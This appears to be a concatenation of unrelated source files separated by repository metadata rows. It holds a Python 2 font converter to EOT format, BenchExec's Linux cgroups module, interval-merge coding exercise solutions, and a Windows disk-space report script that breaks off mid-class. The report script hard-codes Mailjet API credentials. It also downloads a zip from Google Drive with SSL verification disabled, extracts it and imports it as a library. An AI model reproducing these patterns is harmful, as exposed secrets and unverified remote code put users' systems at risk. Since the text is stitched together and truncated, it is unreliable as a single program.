# USHORT format // Format selector (=0).
# USHORT count // Number of name records.
# USHORT stringOffset // Offset to start of string storage (from start of table).
#
# Name Record
#
# USHORT platformID // Platform ID.
# USHORT encodingID // Platform-specific encoding ID.
# USHORT languageID // Language ID.
# USHORT nameID // Name ID.
# USHORT length // String length (in bytes).
# USHORT offset // String offset from start of storage area (in bytes).
#
# head Table
#
# Fixed tableVersion // Table version number 0x00010000 for version 1.0.
# Fixed fontRevision // Set by font manufacturer.
# ULONG checkSumAdjustment // To compute: set it to 0, sum the entire font as ULONG, then store 0xB1B0AFBA - sum.
# ULONG magicNumber // Set to 0x5F0F3CF5.
# USHORT flags
# USHORT unitsPerEm // Valid range is from 16 to 16384. This value should be a power of 2 for fonts that have TrueType outlines.
# LONGDATETIME created // Number of seconds since 12:00 midnight, January 1, 1904. 64-bit integer
# LONGDATETIME modified // Number of seconds since 12:00 midnight, January 1, 1904. 64-bit integer
# SHORT xMin // For all glyph bounding boxes.
# SHORT yMin
# SHORT xMax
# SHORT yMax
# USHORT macStyle
# USHORT lowestRecPPEM // Smallest readable size in pixels.
# SHORT fontDirectionHint
# SHORT indexToLocFormat // 0 for short offsets, 1 for long.
# SHORT glyphDataFormat // 0 for current format.
#
#
#
# Embedded OpenType (EOT) file format
# http://www.w3.org/Submission/EOT/
#
# EOT version 0x00020001
#
# An EOT font consists of a header with the original OpenType font
# appended at the end. Most of the data in the EOT header is simply a
# copy of data from specific tables within the font data. The exceptions
# are the 'Flags' field and the root string name field. The root string
# is a set of names indicating domains for which the font data can be
# used. A null root string implies the font data can be used anywhere.
# The EOT header is in little-endian byte order but the font data remains
# in big-endian order as specified by the OpenType spec.
#
# Overall structure:
#
# [EOT header]
# [EOT name records]
# [font data]
#
# EOT header
#
# ULONG eotSize // Total structure length in bytes (including string and font data)
# ULONG fontDataSize // Length of the OpenType font (FontData) in bytes
# ULONG version // Version number of this format - 0x00020001
# ULONG flags // Processing Flags (0 == no special processing)
# BYTE fontPANOSE[10] // OS/2 Table panose
# BYTE charset // DEFAULT_CHARSET (0x01)
# BYTE italic // 0x01 if ITALIC in OS/2 Table fsSelection is set, 0 otherwise
# ULONG weight // OS/2 Table usWeightClass
# USHORT fsType // OS/2 Table fsType (specifies embedding permission flags)
# USHORT magicNumber // Magic number for EOT file - 0x504C.
# ULONG unicodeRange1 // OS/2 Table ulUnicodeRange1
# ULONG unicodeRange2 // OS/2 Table ulUnicodeRange2
# ULONG unicodeRange3 // OS/2 Table ulUnicodeRange3
# ULONG unicodeRange4 // OS/2 Table ulUnicodeRange4
# ULONG codePageRange1 // OS/2 Table ulCodePageRange1
# ULONG codePageRange2 // OS/2 Table ulCodePageRange2
# ULONG checkSumAdjustment // head Table CheckSumAdjustment
# ULONG reserved[4] // Reserved - must be 0
# USHORT padding1 // Padding - must be 0
#
# EOT name records
#
# USHORT FamilyNameSize // Font family name size in bytes
# BYTE FamilyName[FamilyNameSize] // Font family name (name ID = 1), little-endian UTF-16
# USHORT Padding2 // Padding - must be 0
#
# USHORT StyleNameSize // Style name size in bytes
# BYTE StyleName[StyleNameSize] // Style name (name ID = 2), little-endian UTF-16
# USHORT Padding3 // Padding - must be 0
#
# USHORT VersionNameSize // Version name size in bytes
# bytes VersionName[VersionNameSize] // Version name (name ID = 5), little-endian UTF-16
# USHORT Padding4 // Padding - must be 0
#
# USHORT FullNameSize // Full name size in bytes
# BYTE FullName[FullNameSize] // Full name (name ID = 4), little-endian UTF-16
# USHORT Padding5 // Padding - must be 0
#
# USHORT RootStringSize // Root string size in bytes
# BYTE RootString[RootStringSize] // Root string, little-endian UTF-16
import optparse
import struct
class FontError(Exception):
"""Error related to font handling"""
pass
def multichar(str):
"""
:param str:
:type str:
:return:
:rtype:
"""
vals = struct.unpack('4B', str[:4])
return (vals[0] << 24) + (vals[1] << 16) + (vals[2] << 8) + vals[3]
def multicharval(v):
"""
:param v:
:type v:
:return:
:rtype:
"""
return struct.pack('4B', (v >> 24) & 0xFF, (v >> 16) & 0xFF, (v >> 8) & 0xFF, v & 0xFF)
class EOT:
EOT_VERSION = 0x00020001
EOT_MAGIC_NUMBER = 0x504c
EOT_DEFAULT_CHARSET = 0x01
EOT_FAMILY_NAME_INDEX = 0 # order of names in variable portion of EOT header
EOT_STYLE_NAME_INDEX = 1
EOT_VERSION_NAME_INDEX = 2
EOT_FULL_NAME_INDEX = 3
EOT_NUM_NAMES = 4
EOT_HEADER_PACK = '<4L10B2BL2H7L18x'
class OpenType:
SFNT_CFF = multichar('OTTO') # Postscript CFF SFNT version
SFNT_TRUE = 0x10000 # Standard TrueType version
SFNT_APPLE = multichar('true') # Apple TrueType version
SFNT_UNPACK = '>I4H'
TABLE_DIR_UNPACK = '>4I'
TABLE_HEAD = multichar('head') # TrueType table tags
TABLE_NAME = multichar('name')
TABLE_OS2 = multichar('OS/2')
TABLE_GLYF = multichar('glyf')
TABLE_CFF = multichar('CFF ')
OS2_FSSELECTION_ITALIC = 0x1
OS2_UNPACK = '>4xH2xH22x10B4L4xH14x2L'
HEAD_UNPACK = '>8xL'
NAME_RECORD_UNPACK = '>6H'
NAME_ID_FAMILY = 1
NAME_ID_STYLE = 2
NAME_ID_UNIQUE = 3
NAME_ID_FULL = 4
NAME_ID_VERSION = 5
NAME_ID_POSTSCRIPT = 6
PLATFORM_ID_UNICODE = 0 # Mac OS uses this typically
PLATFORM_ID_MICROSOFT = 3
ENCODING_ID_MICROSOFT_UNICODEBMP = 1 # with Microsoft platformID BMP-only Unicode encoding
LANG_ID_MICROSOFT_EN_US = 0x0409 # with Microsoft platformID EN US lang code
def eotname(ttf):
"""
:param ttf:
:type ttf:
:return:
:rtype:
"""
i = ttf.rfind('.')
if i != -1:
ttf = ttf[:i]
return ttf + '.eotlite'
def readfont(f):
"""
:param f:
:type f:
:return:
:rtype:
"""
data = open(f, 'rb').read()
return data
def get_table_directory(data):
"""read the SFNT header and table directory"""
datalen = len(data)
sfntsize = struct.calcsize(OpenType.SFNT_UNPACK)
if sfntsize > datalen:
raise FontError, 'truncated font data'
sfntvers, numTables = struct.unpack(OpenType.SFNT_UNPACK, data[:sfntsize])[:2]
if sfntvers != OpenType.SFNT_CFF and sfntvers != OpenType.SFNT_TRUE:
raise FontError, 'invalid font type';
font = {}
font['version'] = sfntvers
font['numTables'] = numTables
# create set of offsets, lengths for tables
table_dir_size = struct.calcsize(OpenType.TABLE_DIR_UNPACK)
if sfntsize + table_dir_size * numTables > datalen:
raise FontError, 'truncated font data, table directory extends past end of data'
table_dir = {}
for i in range(0, numTables):
start = sfntsize + i * table_dir_size
end = start + table_dir_size
tag, check, bongo, dirlen = struct.unpack(OpenType.TABLE_DIR_UNPACK, data[start:end])
table_dir[tag] = {'offset': bongo, 'length': dirlen, 'checksum': check}
font['tableDir'] = table_dir
return font
def get_name_records(nametable):
"""reads through the name records within name table"""
name = {}
# read the header
headersize = 6
count, strOffset = struct.unpack('>2H', nametable[2:6])
namerecsize = struct.calcsize(OpenType.NAME_RECORD_UNPACK)
if count * namerecsize + headersize > len(nametable):
raise FontError, 'names exceed size of name table'
name['count'] = count
name['strOffset'] = strOffset
# read through the name records
namerecs = {}
for i in range(0, count):
start = headersize + i * namerecsize
end = start + namerecsize
platformID, encodingID, languageID, nameID, namelen, offset = struct.unpack(OpenType.NAME_RECORD_UNPACK, nametable[start:end])
if platformID != OpenType.PLATFORM_ID_MICROSOFT or \
encodingID != OpenType.ENCODING_ID_MICROSOFT_UNICODEBMP or \
languageID != OpenType.LANG_ID_MICROSOFT_EN_US:
continue
namerecs[nameID] = {'offset': offset, 'length': namelen}
name['namerecords'] = namerecs
return name
def make_eot_name_headers(fontdata, nameTableDir):
"""extracts names from the name table and generates the names header portion of the EOT header"""
nameoffset = nameTableDir['offset']
namelen = nameTableDir['length']
name = get_name_records(fontdata[nameoffset : nameoffset + namelen])
namestroffset = name['strOffset']
namerecs = name['namerecords']
eotnames = (OpenType.NAME_ID_FAMILY, OpenType.NAME_ID_STYLE, OpenType.NAME_ID_VERSION, OpenType.NAME_ID_FULL)
nameheaders = []
for nameid in eotnames:
if nameid in namerecs:
namerecord = namerecs[nameid]
noffset = namerecord['offset']
nlen = namerecord['length']
nformat = '%dH' % (nlen / 2) # length is in number of bytes
start = nameoffset + namestroffset + noffset
end = start + nlen
nstr = struct.unpack('>' + nformat, fontdata[start:end])
nameheaders.append(struct.pack('<H' + nformat + '2x', nlen, *nstr))
else:
nameheaders.append(struct.pack('4x')) # len = 0, padding = 0
return ''.join(nameheaders)
# just return a null-string (len = 0)
def make_root_string():
"""
:return:
:rtype:
"""
return struct.pack('2x')
def make_eot_header(fontdata):
"""given ttf font data produce an EOT header"""
fontDataSize = len(fontdata)
font = get_table_directory(fontdata)
# toss out .otf fonts, t2embed library doesn't support these
tableDir = font['tableDir']
# check for required tables
required = (OpenType.TABLE_HEAD, OpenType.TABLE_NAME, OpenType.TABLE_OS2)
for table in required:
if not (table in tableDir):
raise FontError, 'missing required table ' + multicharval(table)
# read name strings
# pull out data from individual tables to construct fixed header portion
# need to calculate eotSize before packing
version = EOT.EOT_VERSION
flags = 0
charset = EOT.EOT_DEFAULT_CHARSET
magicNumber = EOT.EOT_MAGIC_NUMBER
# read values from OS/2 table
os2Dir = tableDir[OpenType.TABLE_OS2]
os2offset = os2Dir['offset']
os2size = struct.calcsize(OpenType.OS2_UNPACK)
if os2size > os2Dir['length']:
raise FontError, 'OS/2 table invalid length'
os2fields = struct.unpack(OpenType.OS2_UNPACK, fontdata[os2offset : os2offset + os2size])
panose = []
urange = []
codepage = []
weight, fsType = os2fields[:2]
panose[:10] = os2fields[2:12]
urange[:4] = os2fields[12:16]
fsSelection = os2fields[16]
codepage[:2] = os2fields[17:19]
italic = fsSelection & OpenType.OS2_FSSELECTION_ITALIC
# read in values from head table
headDir = tableDir[OpenType.TABLE_HEAD]
headoffset = headDir['offset']
headsize = struct.calcsize(OpenType.HEAD_UNPACK)
if headsize > headDir['length']:
raise FontError, 'head table invalid length'
headfields = struct.unpack(OpenType.HEAD_UNPACK, fontdata[headoffset : headoffset + headsize])
checkSumAdjustment = headfields[0]
# make name headers
nameheaders = make_eot_name_headers(fontdata, tableDir[OpenType.TABLE_NAME])
rootstring = make_root_string()
# calculate the total eot size
eotSize = struct.calcsize(EOT.EOT_HEADER_PACK) + len(nameheaders) + len(rootstring) + fontDataSize
fixed = struct.pack(EOT.EOT_HEADER_PACK,
*([eotSize, fontDataSize, version, flags] + panose + [charset, italic] +
[weight, fsType, magicNumber] + urange + codepage + [checkSumAdjustment]))
return ''.join((fixed, nameheaders, rootstring))
def write_eot_font(eot, header, data):
"""
:param eot:
:type eot:
:param header:
:type header:
:param data:
:type data:
:return:
:rtype:
"""
open(eot,'wb').write(''.join((header, data)))
return
def main():
"""
"""
# deal with options
p = optparse.OptionParser()
p.add_option('--output', '-o', default="world")
options, args = p.parse_args()
# iterate over font files
for f in args:
data = readfont(f)
if len(data) == 0:
print 'Error reading %s' % f
else:
eot = eotname(f)
header = make_eot_header(data)
write_eot_font(eot, header, data)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
6f4f8fbbcb0e5c348c98918c383284323a004ea4 | e7a2670b983ae37b4a73ec9db4ce1c7967ae635c | /benchexec/cgroups.py | 5ca4adef56608a870834b68bf6bdf2aaaeb73312 | [
"Apache-2.0"
] | permissive | zmanchun/benchexec | 89bba7b908b1782ad8c771c61ce529ced1c6bce6 | 92427e52840184d51bb88af79e2c10ee5c5fb145 | refs/heads/master | 2021-01-17T17:22:27.917477 | 2017-01-07T16:47:44 | 2017-01-07T16:47:44 | 43,826,931 | 0 | 0 | null | 2015-10-07T15:49:57 | 2015-10-07T15:49:57 | null | UTF-8 | Python | false | false | 15,618 | py | # BenchExec is a framework for reliable benchmarking.
# This file is part of BenchExec.
#
# Copyright (C) 2007-2015 Dirk Beyer
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# prepare for Python 3
from __future__ import absolute_import, division, print_function, unicode_literals
# THIS MODULE HAS TO WORK WITH PYTHON 2.7!
import logging
import os
import shutil
import signal
import tempfile
import time
from benchexec import util
__all__ = [
'find_my_cgroups',
'find_cgroups_of_process',
'BLKIO',
'CPUACCT',
'CPUSET',
'FREEZER',
'MEMORY',
]
CGROUP_NAME_PREFIX='benchmark_'
BLKIO = 'blkio'
CPUACCT = 'cpuacct'
CPUSET = 'cpuset'
FREEZER = 'freezer'
MEMORY = 'memory'
ALL_KNOWN_SUBSYSTEMS = set([
# cgroups for BenchExec
BLKIO, CPUACCT, CPUSET, FREEZER, MEMORY,
# other cgroups users might want
'cpu', 'devices', 'net_cls', 'net_prio', 'hugetlb', 'perf_event', 'pids',
])
def find_my_cgroups(cgroup_paths=None):
"""
Return a Cgroup object with the cgroups of the current process.
Note that it is not guaranteed that all subsystems are available
in the returned object, as a subsystem may not be mounted.
Check with "subsystem in <instance>" before using.
A subsystem may also be present but we do not have the rights to create
child cgroups, this can be checked with require_subsystem().
@param cgroup_paths: If given, use this instead of reading /proc/self/cgroup.
"""
logging.debug('Analyzing /proc/mounts and /proc/self/cgroup for determining cgroups.')
if cgroup_paths is None:
my_cgroups = dict(_find_own_cgroups())
else:
my_cgroups = dict(_parse_proc_pid_cgroup(cgroup_paths))
cgroupsParents = {}
for subsystem, mount in _find_cgroup_mounts():
# Ignore mount points where we do not have any access,
# e.g. because a parent directory has insufficient permissions
# (lxcfs mounts cgroups under /run/lxcfs in such a way).
if os.access(mount, os.F_OK):
cgroupsParents[subsystem] = os.path.join(mount, my_cgroups[subsystem])
return Cgroup(cgroupsParents)
def find_cgroups_of_process(pid):
"""
Return a Cgroup object that represents the cgroups of a given process.
"""
with open('/proc/{}/cgroup'.format(pid), 'rt') as cgroups_file:
return find_my_cgroups(cgroups_file)
def _find_cgroup_mounts():
"""
Return the information which subsystems are mounted where.
@return a generator of tuples (subsystem, mountpoint)
"""
try:
with open('/proc/mounts', 'rt') as mountsFile:
for mount in mountsFile:
mount = mount.split(' ')
if mount[2] == 'cgroup':
mountpoint = mount[1]
options = mount[3]
for option in options.split(','):
if option in ALL_KNOWN_SUBSYSTEMS:
yield (option, mountpoint)
except IOError:
logging.exception('Cannot read /proc/mounts')
def _find_own_cgroups():
"""
For all subsystems, return the information in which (sub-)cgroup this process is in.
(Each process is in exactly cgroup in each hierarchy.)
@return a generator of tuples (subsystem, cgroup)
"""
try:
with open('/proc/self/cgroup', 'rt') as ownCgroupsFile:
for cgroup in _parse_proc_pid_cgroup(ownCgroupsFile):
yield cgroup
except IOError:
logging.exception('Cannot read /proc/self/cgroup')
def _parse_proc_pid_cgroup(content):
"""
Parse a /proc/*/cgroup file into tuples of (subsystem,cgroup).
@param content: An iterable over the lines of the file.
@return: a generator of tuples
"""
for ownCgroup in content:
#each line is "id:subsystem,subsystem:path"
ownCgroup = ownCgroup.strip().split(':')
try:
path = ownCgroup[2][1:] # remove leading /
except IndexError:
raise IndexError("index out of range for " + str(ownCgroup))
for subsystem in ownCgroup[1].split(','):
yield (subsystem, path)
def kill_all_tasks_in_cgroup(cgroup, kill_process_fn):
tasksFile = os.path.join(cgroup, 'tasks')
freezer_file = os.path.join(cgroup, 'freezer.state')
def try_write_to_freezer(content):
try:
util.write_file(content, freezer_file)
except IOError:
pass # expected if freezer not enabled, we try killing without it
i = 0
while True:
i += 1
# TODO We can probably remove this loop over signals and just send
# SIGKILL. We added this loop when killing sub-processes was not reliable
# and we did not know why, but now it is reliable.
for sig in [signal.SIGKILL, signal.SIGINT, signal.SIGTERM]:
try_write_to_freezer('FROZEN')
with open(tasksFile, 'rt') as tasks:
task = None
for task in tasks:
task = task.strip()
if i > 1:
logging.warning('Run has left-over process with pid %s '
'in cgroup %s, sending signal %s (try %s).',
task, cgroup, sig, i)
kill_process_fn(int(task), sig)
if task is None:
return # No process was hanging, exit
try_write_to_freezer('THAWED')
time.sleep(i * 0.5) # wait for the process to exit, this might take some time
def remove_cgroup(cgroup):
if not os.path.exists(cgroup):
logging.warning('Cannot remove CGroup %s, because it does not exist.', cgroup)
return
assert os.path.getsize(os.path.join(cgroup, 'tasks')) == 0
try:
os.rmdir(cgroup)
except OSError:
# sometimes this fails because the cgroup is still busy, we try again once
try:
os.rmdir(cgroup)
except OSError as e:
logging.warning("Failed to remove cgroup %s: error %s (%s)",
cgroup, e.errno, e.strerror)
def _register_process_with_cgrulesengd(pid):
"""Tell cgrulesengd daemon to not move the given process into other cgroups,
if libcgroup is available.
"""
# Logging/printing from inside preexec_fn would end up in the output file,
# not in the correct logger, thus it is disabled here.
from ctypes import cdll
try:
libcgroup = cdll.LoadLibrary('libcgroup.so.1')
failure = libcgroup.cgroup_init()
if failure:
pass
#print('Could not initialize libcgroup, error {}'.format(success))
else:
CGROUP_DAEMON_UNCHANGE_CHILDREN = 0x1
failure = libcgroup.cgroup_register_unchanged_process(pid, CGROUP_DAEMON_UNCHANGE_CHILDREN)
if failure:
pass
#print('Could not register process to cgrulesndg, error {}. '
# 'Probably the daemon will mess up our cgroups.'.format(success))
except OSError:
pass
#print('libcgroup is not available: {}'.format(e.strerror))
class Cgroup(object):
def __init__(self, cgroupsPerSubsystem):
assert set(cgroupsPerSubsystem.keys()) <= ALL_KNOWN_SUBSYSTEMS
assert all(cgroupsPerSubsystem.values())
self.per_subsystem = cgroupsPerSubsystem # update self.paths on every update to this
self.paths = set(cgroupsPerSubsystem.values()) # without duplicates
def __contains__(self, key):
return key in self.per_subsystem
def __getitem__(self, key):
return self.per_subsystem[key]
def __str__(self):
return str(self.paths)
def require_subsystem(self, subsystem):
"""
Check whether the given subsystem is enabled and is writable
(i.e., new cgroups can be created for it).
Produces a log message for the user if one of the conditions is not fulfilled.
If the subsystem is enabled but not writable, it will be removed from
this instance such that further checks with "in" will return "False".
@return A boolean value.
"""
if not subsystem in self:
logging.warning('Cgroup subsystem %s is not enabled. Please enable it with '
'"sudo mount -t cgroup none /sys/fs/cgroup".',
subsystem)
return False
try:
test_cgroup = self.create_fresh_child_cgroup(subsystem)
test_cgroup.remove()
except OSError as e:
self.paths = set(self.per_subsystem.values())
logging.warning('Cannot use cgroup hierarchy mounted at {0} for subsystem {1}, '
'reason: {2}. '
'If permissions are wrong, please run "sudo chmod o+wt \'{0}\'".'
.format(self.per_subsystem[subsystem], subsystem, e.strerror))
del self.per_subsystem[subsystem]
return False
return True
def create_fresh_child_cgroup(self, *subsystems):
"""
Create child cgroups of the current cgroup for at least the given subsystems.
@return: A Cgroup instance representing the new child cgroup(s).
"""
assert set(subsystems).issubset(self.per_subsystem.keys())
createdCgroupsPerSubsystem = {}
createdCgroupsPerParent = {}
for subsystem in subsystems:
parentCgroup = self.per_subsystem[subsystem]
if parentCgroup in createdCgroupsPerParent:
# reuse already created cgroup
createdCgroupsPerSubsystem[subsystem] = createdCgroupsPerParent[parentCgroup]
continue
cgroup = tempfile.mkdtemp(prefix=CGROUP_NAME_PREFIX, dir=parentCgroup)
createdCgroupsPerSubsystem[subsystem] = cgroup
createdCgroupsPerParent[parentCgroup] = cgroup
# add allowed cpus and memory to cgroup if necessary
# (otherwise we can't add any tasks)
def copy_parent_to_child(name):
shutil.copyfile(os.path.join(parentCgroup, name), os.path.join(cgroup, name))
try:
copy_parent_to_child('cpuset.cpus')
copy_parent_to_child('cpuset.mems')
except IOError:
# expected to fail if cpuset subsystem is not enabled in this hierarchy
pass
return Cgroup(createdCgroupsPerSubsystem)
def add_task(self, pid):
"""
Add a process to the cgroups represented by this instance.
"""
_register_process_with_cgrulesengd(pid)
for cgroup in self.paths:
with open(os.path.join(cgroup, 'tasks'), 'w') as tasksFile:
tasksFile.write(str(pid))
def get_all_tasks(self, subsystem):
"""
Return a generator of all PIDs currently in this cgroup for the given subsystem.
"""
with open(os.path.join(self.per_subsystem[subsystem], 'tasks'), 'r') as tasksFile:
for line in tasksFile:
yield int(line)
def kill_all_tasks(self, kill_process_fn):
"""
Kill all tasks in this cgroup forcefully.
"""
for cgroup in self.paths:
kill_all_tasks_in_cgroup(cgroup, kill_process_fn)
def kill_all_tasks_recursively(self, kill_process_fn):
"""
Kill all tasks in this cgroup and all its children cgroups forcefully.
Additionally, the children cgroups will be deleted.
"""
def kill_all_tasks_in_cgroup_recursively(cgroup):
files = [os.path.join(cgroup,f) for f in os.listdir(cgroup)]
subdirs = filter(os.path.isdir, files)
for subCgroup in subdirs:
kill_all_tasks_in_cgroup_recursively(subCgroup)
remove_cgroup(subCgroup)
kill_all_tasks_in_cgroup(cgroup, kill_process_fn)
for cgroup in self.paths:
kill_all_tasks_in_cgroup_recursively(cgroup)
def has_value(self, subsystem, option):
"""
Check whether the given value exists in the given subsystem.
Does not make a difference whether the value is readable, writable, or both.
Do not include the subsystem name in the option name.
Only call this method if the given subsystem is available.
"""
assert subsystem in self
return os.path.isfile(os.path.join(self.per_subsystem[subsystem], subsystem + '.' + option))
def get_value(self, subsystem, option):
"""
Read the given value from the given subsystem.
Do not include the subsystem name in the option name.
Only call this method if the given subsystem is available.
"""
assert subsystem in self, 'Subsystem {} is missing'.format(subsystem)
return util.read_file(self.per_subsystem[subsystem], subsystem + '.' + option)
def get_file_lines(self, subsystem, option):
"""
Read the lines of the given file from the given subsystem.
Do not include the subsystem name in the option name.
Only call this method if the given subsystem is available.
"""
assert subsystem in self
with open(os.path.join(self.per_subsystem[subsystem], subsystem + '.' + option)) as f:
for line in f:
yield line
def get_key_value_pairs(self, subsystem, filename):
"""
Read the lines of the given file from the given subsystem
and split the lines into key-value pairs.
Do not include the subsystem name in the option name.
Only call this method if the given subsystem is available.
"""
assert subsystem in self
return util.read_key_value_pairs_from_file(self.per_subsystem[subsystem], subsystem + '.' + filename)
def set_value(self, subsystem, option, value):
"""
Write the given value for the given subsystem.
Do not include the subsystem name in the option name.
Only call this method if the given subsystem is available.
"""
assert subsystem in self
util.write_file(str(value), self.per_subsystem[subsystem], subsystem + '.' + option)
def remove(self):
"""
Remove all cgroups this instance represents from the system.
This instance is afterwards not usable anymore!
"""
for cgroup in self.paths:
remove_cgroup(cgroup)
del self.paths
del self.per_subsystem
def read_cputime(self):
"""
Read the cputime usage of this cgroup. CPUACCT cgroup needs to be available.
@return cputime usage in seconds
"""
return float(self.get_value(CPUACCT, 'usage'))/1000000000 # nano-seconds to seconds
def read_allowed_memory_banks(self):
"""Get the list of all memory banks allowed by this cgroup."""
return util.parse_int_list(self.get_value(CPUSET, 'mems'))
| [
"[email protected]"
] | |
654f21379131c530e86ac551da8784b4feab6062 | 7e2d802a17e42d50974af29e4c9b658d5da6471b | /HiredInTech/08-cover-the-border.py | e684983873eb1f32812cae3542721e131940be47 | [] | no_license | siddharthadtt1/Leet | a46290bacdf569f69d523413c0129676727cb20e | 1d8b96257f94e16d0c1ccf8d8e8cd3cbd9bdabce | refs/heads/master | 2020-06-20T16:21:15.915761 | 2017-05-15T22:35:42 | 2017-05-15T22:35:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,751 | py | ''' HiredInTech solution '''
def cover_the_border(l, radars):
# Example arguments:
# l = 100
# radars = [ [5, 10], [3, 25], [46, 99], [39, 40], [45, 50] ]
if len(radars) < 1:
return 0
endpoints = []
for end in radars:
endpoints.append([end[0], 0])
endpoints.append([end[1], 1])
endpoints.sort(key = lambda endpoint: endpoint[0])
open_count = 0
last_open = 0
covered = 0
for endpoint in endpoints:
if endpoint[1] == 0:
open_count += 1
if open_count == 1:
last_open = endpoint[0]
else:
open_count -= 1
if open_count == 0:
covered += endpoint[0] - last_open
return covered
''' My solution '''
def cover_the_border_my(l, radars):
# Example arguments:
# l = 100
# radars = [ [5, 10], [3, 25], [46, 99], [39, 40], [45, 50] ]
if len(radars) < 1:
return 0
radars.sort(key = lambda radar: radar[0])
result = []
result.append(radars[0])
j = 0 # last in the result
for i in range(1, len(radars)):
merged = [0, 0]
if can_merge(result[j], radars[i], merged):
result[j][0] = merged[0]
result[j][1] = merged[1]
else:
result.append(radars[i])
j += 1
covered = 0
for seg in result:
covered += seg[1] - seg[0]
return covered
# if seg L1 and seg L2 can merge. if true, merge segs into R
# L1[0] <= L2[0]
def can_merge(L1, L2, R):
if L1[1] < L2[0]:
return False
else:
R[0] = L1[0]
R[1] = max(L1[1], L2[1])
return True
radars = [ [5, 10], [3, 25], [46, 99], [39, 40], [45, 50] ]
print cover_the_border(100, radars) | [
"[email protected]"
] | |
a181287ab47a20cb7149b2e78d496ed95272cafb | 399dae0b5ad9ca27cde175d25b5435958674eb50 | /Reports/Generate Disk Space Report for Endpoints/generate-disk-space-report-for-endpoints.py | a016efdf31e2323d017285a0679d67edcd5a712e | [] | no_license | kannanch/pythonscripts | 61e3ea9e8ebf6a6b0ec2a4a829664e4507b803ba | 843a522236f9c2cc2aadc68d504c71bb72600bd9 | refs/heads/master | 2020-06-12T11:18:00.404673 | 2019-06-28T11:24:37 | 2019-06-28T11:24:37 | 194,282,297 | 1 | 0 | null | 2019-06-28T13:55:56 | 2019-06-28T13:55:56 | null | UTF-8 | Python | false | false | 15,017 | py | no=xx #Edit the xx parameter as Device Timeout. Eg if you have 500 enrolled endpoints then that xx must "100".
Head_computer=r'CHANGE_ME' # Head computer to send the email
emailto=r'CHANGE_ME' # Email address to send the report
Head_computer=Head_computer.upper()
KI=list(Head_computer)
KI.insert(0,str(no))
import datetime
KI.insert(len(KI),datetime.datetime.now().strftime("%Y%m%d"))
KEY="".join(KI)
import ast
import threading
import time
import os
from subprocess import PIPE, Popen
import ctypes
import shutil
import socket,re
import sys
def Email(fileToSend,To):
from mailjet_rest import Client
import os
api_key='3e70858a7a5c5fbc245a662d5d9aa238' # API KEY of Mail Jet
api_secret= 'a337abcc84d8fb062f6f1597d966ae6f' # API SECRET KEY of Mail Jet
mailjet = Client(auth=(api_key, api_secret), version='v3.1')
import base64
with open(fileToSend, 'rb') as fp:
ki=base64.b64encode(fp.read())
data = {
'Messages': [
{
"From": {
"Email": "[email protected]",
},
"To": [
{
"Email": "%s"%To,
}
],
"Subject": "Disk Usage Percentage of all devices ",
"TextPart": "Dear passenger 1, welcome to Mailjet! May the delivery force be with you!",
"HTMLPart": """<h3> Hi \n
Please find the attachment which contains all the device reports \n
Thank you.</h3>""",
"Attachments": [
{
"ContentType": "text/csv",
"Filename": "Diskreport.csv",
"Base64Content": "%s"%ki
}
]
}
]
}
result = mailjet.send.create(data=data)
ret=result.status_code
if ret==200:
out=result.json()
out=str(out)
if "success" in out:
print "Email Sent Successfully"
else:
print "Error sending email"
def Download(URL, DownloadTo = None, FileName = None):
import urllib
import ssl
if FileName:
FileName = FileName
else:
FileName = URL.split('/')[-1]
if DownloadTo:
DownloadTo = DownloadTo
else:
DownloadTo = os.path.join(os.environ['TEMP'])
DF = os.path.join(DownloadTo, FileName)
with open(os.path.join(DownloadTo, FileName), 'wb') as f:
try:
context = ssl._create_unverified_context()
f.write(urllib.urlopen(URL,context=context).read())
except:
f.write(urllib.urlopen(URL).read())
if os.path.isfile(DF):
return DF
else:
return False
def zip_item(path,final_path): # Creating ZIP file
import zipfile
zip_ref = zipfile.ZipFile(path, 'r')
zip_ref.extractall(final_path)
zip_ref.close()
return final_path
def Import_pubnub(DEST):
BDPATH = Download(r'https://drive.google.com/uc?export=download&id=1R1KFmrC0jh6TOdCFePt2SNTbu_ti_CpP', FileName = 'PUBNUB.zip')
SRC = os.path.join(os.environ['TEMP'])
path=zip_item(BDPATH,SRC)
SRC = os.path.join(os.environ['TEMP'],'PUBNUB')
from distutils.dir_util import copy_tree
copy_tree(SRC, DEST)
import pubnub
from pubnub.pnconfiguration import PNConfiguration
from pubnub.pubnub import PubNub
from pubnub.callbacks import SubscribeCallback
print "Pubnub is imported"
return DEST
def computername():
return os.environ['COMPUTERNAME']
def ipaddress():
return socket.gethostbyname(socket.gethostname())
vbs=r'''
Sub DpySpaceInfo(ByVal infotype, ByVal drvSpace, ByVal percentage)
textline = Space(12 - Len(infotype)) & infotype & Space(17 - Len(drvSpace)) & drvSpace
'If percentage <> "" Then textline = textline & Space(33 - Len(textline)) & percentage
If percentage <> "" Then textline = textline & Space(11 - Len(percentage)) & percentage
WScript.Echo textline
End Sub
' Function to calculate the used and free space on the disk drive.
Sub GetDriveSpace(ByRef drive)
totalSpace = drive.TotalSize / 1024
freeSpace = drive.AvailableSpace / 1024
percentFree = freeSpace / totalSpace
percentUsed = 1 - percentFree
dpyUsedSpace = FormatNumber(totalSpace - freeSpace, 0, vbTrue, vbFalse, vbTrue) & " KB"
dpyFreeSpace = FormatNumber(freeSpace, 0, vbTrue, vbFalse, vbTrue) & " KB"
dpyTotalSpace = FormatNumber(totalSpace, 0, vbTrue, vbFalse, vbTrue) & " KB"
dpyPercentUsed = FormatPercent(percentUsed, 2, vbTrue, vbFalse, vbTrue)
dpyPercentFree = FormatPercent(percentFree, 2, vbTrue, vbFalse, vbTrue)
WScript.Echo "DRIVE " & drive.DriveLetter & ":" &dpyPercentFree
End Sub
Set oFileSystem = CreateObject("Scripting.FileSystemObject")
Set drivesList = oFileSystem.Drives
' Iterage through all drives ignoring all but fixed drives.
For Each d In drivesList
If d.DriveType = 2 Then GetDriveSpace d
Next
'''
class disable_file_system_redirection:
_disable = ctypes.windll.kernel32.Wow64DisableWow64FsRedirection
_revert = ctypes.windll.kernel32.Wow64RevertWow64FsRedirection
def __enter__(self):
